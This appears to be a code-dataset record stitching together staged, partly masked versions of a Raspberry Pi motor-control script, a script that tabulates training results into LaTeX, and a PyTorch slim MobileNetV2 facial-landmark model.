"step-2": "<mask token>\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\ntry:\n pass\nexcept KeyboardInterrupt:\n destroy()\n",
"step-3": "<mask token>\nMotor_B_EN = 11\nMotor_B_Pin1 = 13\nMotor_B_Pin2 = 12\nDir_forward = 0\nDir_backward = 1\npwm_B = 0\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\ntry:\n pass\nexcept KeyboardInterrupt:\n destroy()\n",
"step-4": "import RPi.GPIO as GPIO\nimport time\nMotor_B_EN = 11\nMotor_B_Pin1 = 13\nMotor_B_Pin2 = 12\nDir_forward = 0\nDir_backward = 1\npwm_B = 0\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\ntry:\n pass\nexcept KeyboardInterrupt:\n destroy()\n",
"step-5": "#!/usr/bin/python3\n\nimport RPi.GPIO as GPIO\nimport time\n# motor_EN_A: Pin7 | motor_EN_B: Pin11\n# motor_A: Pin8,Pin10 | motor_B: Pin13,Pin12\n\n#Motor_A_EN = 7\nMotor_B_EN = 11\n\n#Motor_A_Pin1 = 8\n#Motor_A_Pin2 = 10\nMotor_B_Pin1 = 13\nMotor_B_Pin2 = 12\n\nDir_forward = 0\nDir_backward = 1\n\n#pwm_A = 0\npwm_B = 0\n\ndef setup():#Motor initialization\n\tglobal pwm_A, pwm_B\n\tGPIO.setwarnings(False)\n\tGPIO.setmode(GPIO.BOARD)\n\t#GPIO.setup(Motor_A_EN, GPIO.OUT)\n\tGPIO.setup(Motor_B_EN, GPIO.OUT)\n\t#GPIO.setup(Motor_A_Pin1, GPIO.OUT)\n\t#GPIO.setup(Motor_A_Pin2, GPIO.OUT)\n\tGPIO.setup(Motor_B_Pin1, GPIO.OUT)\n\tGPIO.setup(Motor_B_Pin2, GPIO.OUT)\n\t#pwm_A = GPIO.PWM(Motor_A_EN, 1000)\n\tpwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\ndef motorStop():#Motor stops\n\t#GPIO.output(Motor_A_Pin1, GPIO.LOW)\n\t#GPIO.output(Motor_A_Pin2, GPIO.LOW)\n\tGPIO.output(Motor_B_Pin1, GPIO.LOW)\n\tGPIO.output(Motor_B_Pin2, GPIO.LOW)\n\t#GPIO.output(Motor_A_EN, GPIO.LOW)\n\tGPIO.output(Motor_B_EN, GPIO.LOW)\n\ndef motorStart(status, direction, speed):#Motor 2 positive and negative rotation\n\tglobal pwm_B\n\tif status == 0: # stop\n\t\tmotorStop()\n\telse:\n\t\tif direction == Dir_forward:\n\t\t\tGPIO.output(Motor_B_Pin1, GPIO.HIGH)\n\t\t\tGPIO.output(Motor_B_Pin2, GPIO.LOW)\n\t\t\tpwm_B.start(100)\n\t\t\tpwm_B.ChangeDutyCycle(speed)\n\t\telif direction == Dir_backward:\n\t\t\tGPIO.output(Motor_B_Pin1, GPIO.LOW)\n\t\t\tGPIO.output(Motor_B_Pin2, GPIO.HIGH)\n\t\t\tpwm_B.start(0)\n\t\t\tpwm_B.ChangeDutyCycle(speed)\n\ndef destroy():\n\tmotorStop()\n\tGPIO.cleanup() # Release resource\n\ntry:\n\tpass\nexcept KeyboardInterrupt:\n\tdestroy()\n\n\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
table.write('\\begin{tabular}{|c|c|c|c|} \\hline\n')
table.write(
'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n')
<|reserved_special_token_0|>
for h in H:
file = open('Out\\out-h' + str(h) + '.txt', 'r')
line = file.readlines()[-1]
file.close()
line = line.split(',')
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +
' \\\\\n')
table.write('\\hline\n')
table.write('\\end{tabular}')
table.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
table = open('Tables\\table1.txt', 'w')
table.write('\\begin{tabular}{|c|c|c|c|} \\hline\n')
table.write(
'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n')
H = [1, 5, 10, 11, 12, 20, 40]
for h in H:
file = open('Out\\out-h' + str(h) + '.txt', 'r')
line = file.readlines()[-1]
file.close()
line = line.split(',')
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +
' \\\\\n')
table.write('\\hline\n')
table.write('\\end{tabular}')
table.close()
<|reserved_special_token_1|>
from __future__ import division
import numpy as np  # NOTE(review): imported but unused in this script
# Build a LaTeX tabular summarizing, per hidden-layer size, the metrics
# found on the final line of each training-run log under Out\.
table = open('Tables\\table1.txt', 'w')
table.write('\\begin{tabular}{|c|c|c|c|} \\hline\n')
table.write(
    'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n')
H = [1, 5, 10, 11, 12, 20, 40]  # hidden-neuron counts to tabulate
for h in H:
    # Only the last log line matters; fields 1-3 of its comma-separated
    # record are the loss, training accuracy and validation accuracy.
    file = open('Out\\out-h' + str(h) + '.txt', 'r')
    line = file.readlines()[-1]
    file.close()
    line = line.split(',')
    loss = line[1]
    acc_tr = line[2]
    acc_va = line[3]
    # One table row: "h & loss & train acc & valid acc \\"
    table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +
        ' \\\\\n')
table.write('\\hline\n')
table.write('\\end{tabular}')
table.close()
<|reserved_special_token_1|>
from __future__ import division
import numpy as np
table = open("Tables\\table1.txt", "w")
table.write("\\begin{tabular}{|c|c|c|c|} \\hline\n")
table.write("Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n")
H = [1,5,10,11,12,20,40]
for h in H:
file = open("Out\\out-h"+str(h)+".txt", "r")
line = file.readlines()[-1]
file.close()
line = line.split(",")
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h)+" & "+loss+" & "+acc_tr+" & "+acc_va+" \\\\\n")
table.write("\\hline\n")
table.write("\\end{tabular}")
table.close()
|
flexible
|
{
"blob_id": "3cace66ddf8484d285c2b2a8fabbb83778a2c4af",
"index": 4352,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntable.write('\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n')\ntable.write(\n 'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n')\n<mask token>\nfor h in H:\n file = open('Out\\\\out-h' + str(h) + '.txt', 'r')\n line = file.readlines()[-1]\n file.close()\n line = line.split(',')\n loss = line[1]\n acc_tr = line[2]\n acc_va = line[3]\n table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +\n ' \\\\\\\\\\n')\ntable.write('\\\\hline\\n')\ntable.write('\\\\end{tabular}')\ntable.close()\n",
"step-3": "<mask token>\ntable = open('Tables\\\\table1.txt', 'w')\ntable.write('\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n')\ntable.write(\n 'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n')\nH = [1, 5, 10, 11, 12, 20, 40]\nfor h in H:\n file = open('Out\\\\out-h' + str(h) + '.txt', 'r')\n line = file.readlines()[-1]\n file.close()\n line = line.split(',')\n loss = line[1]\n acc_tr = line[2]\n acc_va = line[3]\n table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +\n ' \\\\\\\\\\n')\ntable.write('\\\\hline\\n')\ntable.write('\\\\end{tabular}')\ntable.close()\n",
"step-4": "from __future__ import division\nimport numpy as np\ntable = open('Tables\\\\table1.txt', 'w')\ntable.write('\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n')\ntable.write(\n 'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n')\nH = [1, 5, 10, 11, 12, 20, 40]\nfor h in H:\n file = open('Out\\\\out-h' + str(h) + '.txt', 'r')\n line = file.readlines()[-1]\n file.close()\n line = line.split(',')\n loss = line[1]\n acc_tr = line[2]\n acc_va = line[3]\n table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +\n ' \\\\\\\\\\n')\ntable.write('\\\\hline\\n')\ntable.write('\\\\end{tabular}')\ntable.close()\n",
"step-5": "from __future__ import division\nimport numpy as np\n\ntable = open(\"Tables\\\\table1.txt\", \"w\")\n\ntable.write(\"\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n\")\ntable.write(\"Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n\")\n\nH = [1,5,10,11,12,20,40]\nfor h in H:\n\tfile = open(\"Out\\\\out-h\"+str(h)+\".txt\", \"r\")\n\tline = file.readlines()[-1]\n\tfile.close()\n\tline = line.split(\",\")\n\tloss = line[1]\n\tacc_tr = line[2]\n\tacc_va = line[3]\n\ttable.write(str(h)+\" & \"+loss+\" & \"+acc_tr+\" & \"+acc_va+\" \\\\\\\\\\n\")\n\ntable.write(\"\\\\hline\\n\")\ntable.write(\"\\\\end{tabular}\")\n\ntable.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import division
import torch
import torch.nn as nn
import math
def conv_bn(inp, oup, stride):
    """3x3 convolution (padding 1, no bias) -> BatchNorm -> ReLU stem block."""
    layers = [
        nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
        nn.BatchNorm2d(oup),
        nn.ReLU(inplace=True),
    ]
    return nn.Sequential(*layers)
def conv_1x1_bn(inp, oup):
    """Pointwise 1x1 convolution (no bias) -> BatchNorm -> ReLU projection."""
    return nn.Sequential(
        nn.Conv2d(inp, oup, kernel_size=1, stride=1, padding=0, bias=False),
        nn.BatchNorm2d(oup),
        nn.ReLU(inplace=True),
    )
class InvertedResidual(nn.Module):
    """MobileNetV2 inverted-residual block: (optional pointwise expansion) ->
    depthwise 3x3 -> linear pointwise projection.

    The identity skip connection is used only when stride == 1 and the
    input/output channel counts match. NOTE: this variant uses plain ReLU
    rather than ReLU6.
    """

    def __init__(self, inp, oup, stride, expand_ratio):
        super(InvertedResidual, self).__init__()
        self.stride = stride
        assert stride in [1, 2]

        hidden_dim = round(inp * expand_ratio)
        self.use_res_connect = self.stride == 1 and inp == oup

        layers = []
        if expand_ratio != 1:
            # pointwise expansion to hidden_dim channels
            layers += [
                nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),
                nn.BatchNorm2d(hidden_dim),
                nn.ReLU(inplace=True),
            ]
        layers += [
            # depthwise 3x3 (groups == channels)
            nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),
            nn.BatchNorm2d(hidden_dim),
            nn.ReLU(inplace=True),
            # linear pointwise projection (no activation afterwards)
            nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
            nn.BatchNorm2d(oup),
        ]
        self.conv = nn.Sequential(*layers)

    def forward(self, x):
        out = self.conv(x)
        return x + out if self.use_res_connect else out
class SmallMobileNetV2(nn.Module):
    """Slimmed-down MobileNetV2 backbone with a 3-layer MLP head regressing
    ``num_classes`` values (e.g. 2 * number of landmarks).

    The head flattens 4 * last_channel features, so after the overall
    downsampling (stem stride 2 plus six stride-2 stages, factor 128) the
    feature map must be 2x2 — e.g. a 256x256 square input.
    """
    def __init__(self, widen_factor=1.0, num_classes=1000): #, input_size=224
        # widen_factor scales every channel count; num_classes is the
        # number of regression outputs.
        super(SmallMobileNetV2, self).__init__()
        block = InvertedResidual
        input_channel = 8
        last_channel = 64
        interverted_residual_setting = [
            # t (expansion), c (out channels), n (repeats), s (first-block stride)
            [1, 8, 1, 1],
            [6, 12, 2, 2],
            [6, 16, 2, 2],
            [6, 24, 3, 2],
            [6, 32, 3, 2],
            [6, 48, 3, 2],
            [6, 64, 2, 2],
            [6, 80, 1, 1],
        ]

        # building first layer
        # assert input_size % 32 == 0
        input_channel = int(input_channel * widen_factor)
        # last_channel is only ever widened, never narrowed below 64
        self.last_channel = int(last_channel * widen_factor) if widen_factor > 1.0 else last_channel
        self.features = [conv_bn(3, input_channel, 2)]
        # building inverted residual blocks
        for t, c, n, s in interverted_residual_setting:
            output_channel = int(c * widen_factor)
            for i in range(n):
                if i == 0:
                    # only the first block of each stage downsamples
                    self.features.append(block(input_channel, output_channel, s, expand_ratio=t))
                else:
                    self.features.append(block(input_channel, output_channel, 1, expand_ratio=t))
                input_channel = output_channel
        # building last several layers
        self.features.append(conv_1x1_bn(input_channel, self.last_channel))
        # make it nn.Sequential
        self.features = nn.Sequential(*self.features)

        # building pts net: MLP over the flattened (4 * last_channel) features
        self.pts_net = nn.Sequential(
            nn.Linear(4*self.last_channel, 256),
            nn.PReLU(),
            nn.Linear(256, 256),
            nn.PReLU(),
            nn.Linear(256, num_classes)
        )

        self._initialize_weights()

    def forward(self, x):
        """Return the regressed point vector for an input image batch."""
        x = self.features(x)
        x = x.view(x.size(0), -1)  # flatten to (batch, 4 * last_channel)
        pts = self.pts_net(x)
        return pts

    def _initialize_weights(self):
        """He-style init for convs, unit weight / zero bias for BN,
        N(0, 0.01) for linear layers."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
                if m.bias is not None:
                    m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                n = m.weight.size(1)
                m.weight.data.normal_(0, 0.01)
                m.bias.data.zero_()
class SmallMobileNetV2Part(nn.Module):
    """Four-branch landmark regressor: independent slim-MobileNetV2 backbones
    for the left-eye, right-eye, nose and mouth crops, each followed by its
    own small MLP head.

    num_classes selects the landmark layout (68/98/106-point, x and y per
    point) and fixes how many coordinates each part head emits.
    """

    def __init__(self, widen_factor=1.0, num_classes=68*2): #, input_size=224
        super(SmallMobileNetV2Part, self).__init__()
        self.block = InvertedResidual
        self.input_channel = 8
        self.last_channel = 64
        self.interverted_residual_setting = [
            # t (expansion), c (out channels), n (repeats), s (first-block stride)
            [1, 8, 1, 1],
            [6, 12, 2, 2],
            [6, 16, 2, 2],
            [6, 24, 3, 2],
            [6, 32, 3, 2],
            [6, 48, 3, 2],
            [6, 64, 2, 2],
            [6, 80, 1, 1],
        ]
        # Output width of each part head: [left eye, right eye, nose, mouth].
        if num_classes == 68*2:
            part_dim = [22, 22, 18, 40]
        elif num_classes == 98*2:
            part_dim = [36, 36, 18, 40]
        elif num_classes == 106*2:
            part_dim = [38, 38, 30, 40]
        else:
            # Fix: fail fast with a clear message instead of hitting an
            # UnboundLocalError on part_dim below.
            raise ValueError(
                'num_classes must be one of 136, 196 or 212, got %r' % (num_classes,))

        # One independent feature extractor per facial part.
        self.left_eye_net = self.make_backbone(widen_factor)
        self.right_eye_net = self.make_backbone(widen_factor)
        self.nose_net = self.make_backbone(widen_factor)
        self.mouth_net = self.make_backbone(widen_factor)

        # One regression head per part.
        self.left_eye_loc = self.make_pts_fc(part_dim[0])
        self.right_eye_loc = self.make_pts_fc(part_dim[1])
        self.nose_loc = self.make_pts_fc(part_dim[2])
        self.mouth_loc = self.make_pts_fc(part_dim[3])

        self._initialize_weights()

    def make_backbone(self, widen_factor):
        """Build one slim-MobileNetV2 extractor: conv stem, the configured
        inverted-residual stages, then a 1x1 projection to last_channel."""
        input_channel = int(self.input_channel * widen_factor)
        last_channel = int(self.last_channel * widen_factor) if widen_factor > 1.0 else self.last_channel
        features = [conv_bn(3, input_channel, 2)]
        for t, c, n, s in self.interverted_residual_setting:
            output_channel = int(c * widen_factor)
            for i in range(n):
                stride = s if i == 0 else 1  # only the first block downsamples
                features.append(self.block(input_channel, output_channel, stride, expand_ratio=t))
                input_channel = output_channel
        features.append(conv_1x1_bn(input_channel, last_channel))
        return nn.Sequential(*features)

    def make_pts_fc(self, num_classes):
        """Build a 3-layer PReLU MLP head mapping last_channel features to
        num_classes coordinates (the flattened feature must be exactly
        last_channel wide, i.e. a 1x1 spatial map)."""
        pts_net = nn.Sequential(
            nn.Linear(self.last_channel, 64),
            nn.PReLU(),
            nn.Linear(64, 64),
            nn.PReLU(),
            nn.Linear(64, num_classes)
        )
        return pts_net

    def forward(self, x):
        """x: sequence of four image batches ordered
        [left eye, right eye, nose, mouth]; returns the four per-part
        coordinate predictions in the same order."""
        xs_1 = self.left_eye_net(x[0])
        xs_1 = torch.flatten(xs_1, 1)
        out_1 = self.left_eye_loc(xs_1)

        xs_2 = self.right_eye_net(x[1])
        xs_2 = torch.flatten(xs_2, 1)
        out_2 = self.right_eye_loc(xs_2)

        xs_3 = self.nose_net(x[2])
        xs_3 = torch.flatten(xs_3, 1)
        out_3 = self.nose_loc(xs_3)

        xs_4 = self.mouth_net(x[3])
        xs_4 = torch.flatten(xs_4, 1)
        out_4 = self.mouth_loc(xs_4)

        return [out_1, out_2, out_3, out_4]

    def _initialize_weights(self):
        """He-style init for convs, unit/zero for BN, N(0, 0.01) linears."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
                if m.bias is not None:
                    m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                n = m.weight.size(1)
                m.weight.data.normal_(0, 0.01)
                m.bias.data.zero_()
|
normal
|
{
"blob_id": "be1638638c70cf761bf5d2f0eb474b44684dfa47",
"index": 4657,
"step-1": "<mask token>\n\n\nclass SmallMobileNetV2(nn.Module):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return 
pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-2": "<mask token>\n\n\nclass InvertedResidual(nn.Module):\n <mask token>\n <mask token>\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n 
self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = 
torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
